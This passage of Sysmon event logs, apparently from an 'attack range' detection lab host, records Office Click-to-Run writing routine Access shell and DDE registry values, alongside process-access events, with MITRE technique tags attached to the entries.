Office\Root\Office16\MSACCESS.EXE" /NOSTARTUP /SHELLSYSTEM [OpenStoredProcedure "%%1"] 13241300x800000000000000075424Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.358{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.StoredProcedure.1\shell\design\ddeexec\topic\(Default)ShellSystem 13241300x800000000000000075423Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.358{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.StoredProcedure.1\shell\design\ddeexec\ifexec\(Default)[] 13241300x800000000000000075422Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.358{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.StoredProcedure.1\shell\design\ddeexec\(Default)[SetForeground][OpenStoredProcedure "%%1", 1] 13241300x800000000000000075421Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.358{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.StoredProcedure.1\shell\design\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\MSACCESS.EXE" /NOSTARTUP /SHELLSYSTEM [OpenStoredProcedure "%%1", 1] 10341000x800000000000000075420Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:41.358{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBE5-607E-1E0D-00000000BB01}5660C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075419Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:41.358{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBE5-607E-1E0D-00000000BB01}5660C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 13241300x800000000000000075418Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.342{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Report.1\shell\printto\ddeexec\topic\(Default)ShellSystem 13241300x800000000000000075417Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.342{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Report.1\shell\printto\ddeexec\ifexec\(Default)[] 13241300x800000000000000075416Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.342{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Report.1\shell\printto\ddeexec\(Default)[PrintTo "%%1","%%2","%%3","%%4"] 13241300x800000000000000075415Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.342{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Report.1\shell\printto\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\MSACCESS.EXE /NOSTARTUP /SHELLSYSTEM [PrintTo "%%1","%%2","%%3","%%4"][ShellQuit] 13241300x800000000000000075414Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.342{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Report.1\shell\print\ddeexec\topic\(Default)ShellSystem 13241300x800000000000000075413Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.342{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Report.1\shell\print\ddeexec\ifexec\(Default)[] 13241300x800000000000000075412Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.342{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Report.1\shell\print\ddeexec\(Default)[PrintTo "%%1"] 13241300x800000000000000075411Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.327{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Report.1\shell\print\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\MSACCESS.EXE /NOSTARTUP /SHELLSYSTEM [PrintTo "%%1"][ShellQuit] 13241300x800000000000000075410Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.327{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Report.1\shell\preview\ddeexec\topic\(Default)ShellSystem 13241300x800000000000000075409Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.327{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Report.1\shell\preview\ddeexec\ifexec\(Default)[] 13241300x800000000000000075408Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.327{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Report.1\shell\preview\ddeexec\(Default)[SetForeground][OpenReport "%%1", 2] 13241300x800000000000000075407Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.327{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Report.1\shell\preview\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\MSACCESS.EXE" /NOSTARTUP /SHELLSYSTEM [OpenReport "%%1", 2] 13241300x800000000000000075406Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.327{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Report.1\shell\open\ddeexec\topic\(Default)ShellSystem 13241300x800000000000000075405Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.327{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Report.1\shell\open\ddeexec\ifexec\(Default)[] 13241300x800000000000000075404Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.327{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Report.1\shell\open\ddeexec\(Default)[SetForeground][OpenReport "%%1", 2] 13241300x800000000000000075403Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.311{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Report.1\shell\open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\MSACCESS.EXE" /NOSTARTUP /SHELLSYSTEM [OpenReport "%%1", 2] 13241300x800000000000000075402Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.311{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Report.1\shell\design\ddeexec\topic\(Default)ShellSystem 13241300x800000000000000075401Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.311{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Report.1\shell\design\ddeexec\ifexec\(Default)[] 13241300x800000000000000075400Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.311{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Report.1\shell\design\ddeexec\(Default)[SetForeground][OpenReport "%%1", 1] 13241300x800000000000000075399Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.311{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Report.1\shell\design\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\MSACCESS.EXE" /NOSTARTUP /SHELLSYSTEM [OpenReport "%%1", 1] 13241300x800000000000000075398Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.311{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Report.1\shell\browse\ddeexec\topic\(Default)ShellSystem 13241300x800000000000000075397Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.311{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Report.1\shell\browse\ddeexec\ifexec\(Default)[] 13241300x800000000000000075396Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.311{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Report.1\shell\browse\ddeexec\(Default)[SetForeground][OpenReport "%%1", 5] 13241300x800000000000000075395Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.295{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Report.1\shell\browse\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\MSACCESS.EXE" /NOSTARTUP /SHELLSYSTEM [OpenReport "%%1", 5] 13241300x800000000000000075394Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.280{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Module.1\shell\open\ddeexec\topic\(Default)ShellSystem 13241300x800000000000000075393Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.280{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Module.1\shell\open\ddeexec\ifexec\(Default)[] 13241300x800000000000000075392Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.280{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Module.1\shell\open\ddeexec\(Default)[SetForeground][OpenModule "%%1"] 13241300x800000000000000075391Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.280{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Module.1\shell\open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\MSACCESS.EXE" /NOSTARTUP /SHELLSYSTEM [OpenModule "%%1"] 13241300x800000000000000075390Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.264{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Diagram.1\shell\open\ddeexec\topic\(Default)ShellSystem 13241300x800000000000000075389Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.264{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Diagram.1\shell\open\ddeexec\ifexec\(Default)[] 13241300x800000000000000075388Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.264{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Diagram.1\shell\open\ddeexec\(Default)[SetForeground][OpenDiagram "%%1"] 13241300x800000000000000075387Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.264{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Diagram.1\shell\open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\MSACCESS.EXE" /NOSTARTUP /SHELLSYSTEM [OpenDiagram "%%1"] 10341000x800000000000000075386Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:41.264{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBE5-607E-1D0D-00000000BB01}1684C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000075385Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.248{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.DataAccessPage.1\shell\open\ddeexec\topic\(Default)ShellSystem 13241300x800000000000000075384Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.248{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.DataAccessPage.1\shell\open\ddeexec\ifexec\(Default)[] 13241300x800000000000000075383Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.248{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.DataAccessPage.1\shell\open\ddeexec\(Default)[SetForeground][OpenDataAccessPage "%%1"] 13241300x800000000000000075382Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.248{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.DataAccessPage.1\shell\open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\MSACCESS.EXE" /NOSTARTUP /SHELLSYSTEM [OpenDataAccessPage "%%1"] 10341000x800000000000000075381Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:41.248{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBE5-607E-1D0D-00000000BB01}1684C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 13241300x800000000000000075380Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.248{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.DataAccessPage.1\shell\design\ddeexec\topic\(Default)ShellSystem 10341000x800000000000000075379Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:41.248{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBE5-607E-1D0D-00000000BB01}1684C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 13241300x800000000000000075378Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.248{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.DataAccessPage.1\shell\design\ddeexec\ifexec\(Default)[] 13241300x800000000000000075377Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.248{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.DataAccessPage.1\shell\design\ddeexec\(Default)[SetForeground][OpenDataAccessPage "%%1", 1] 13241300x800000000000000075376Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.248{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.DataAccessPage.1\shell\design\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\MSACCESS.EXE" /NOSTARTUP /SHELLSYSTEM [OpenDataAccessPage "%%1", 1] 13241300x800000000000000075375Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.233{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.UriLink.16\shell\open\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\protocolhandler.exe "%%1" 13241300x800000000000000075374Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.217{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Macro.1\shell\open\ddeexec\topic\(Default)ShellSystem 13241300x800000000000000075373Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.217{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Macro.1\shell\open\ddeexec\ifexec\(Default)[] 13241300x800000000000000075372Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.202{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Macro.1\shell\open\ddeexec\(Default)[SetForeground][ShellOpenMacro "%%1"] 13241300x800000000000000075371Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.202{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Macro.1\shell\open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\MSACCESS.EXE" /NOSTARTUP /SHELLSYSTEM [ShellOpenMacro "%%1"] 13241300x800000000000000075370Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.202{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Macro.1\shell\design\ddeexec\topic\(Default)ShellSystem 13241300x800000000000000075369Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.202{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Macro.1\shell\design\ddeexec\ifexec\(Default)[] 13241300x800000000000000075368Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.202{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Macro.1\shell\design\ddeexec\(Default)[SetForeground][ShellOpenMacro "%%1", 1] 13241300x800000000000000075367Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.202{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Macro.1\shell\design\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\MSACCESS.EXE" /NOSTARTUP /SHELLSYSTEM [ShellOpenMacro "%%1", 1] 13241300x800000000000000075366Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.186{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.View.1\shell\open\ddeexec\topic\(Default)ShellSystem 13241300x800000000000000075365Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.170{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.View.1\shell\open\ddeexec\ifexec\(Default)[] 13241300x800000000000000075364Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.170{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.View.1\shell\open\ddeexec\(Default)[SetForeground][OpenView "%%1"] 13241300x800000000000000075363Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.170{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.View.1\shell\open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\MSACCESS.EXE" /NOSTARTUP /SHELLSYSTEM [OpenView "%%1"] 13241300x800000000000000075362Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.170{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.View.1\shell\design\ddeexec\topic\(Default)ShellSystem 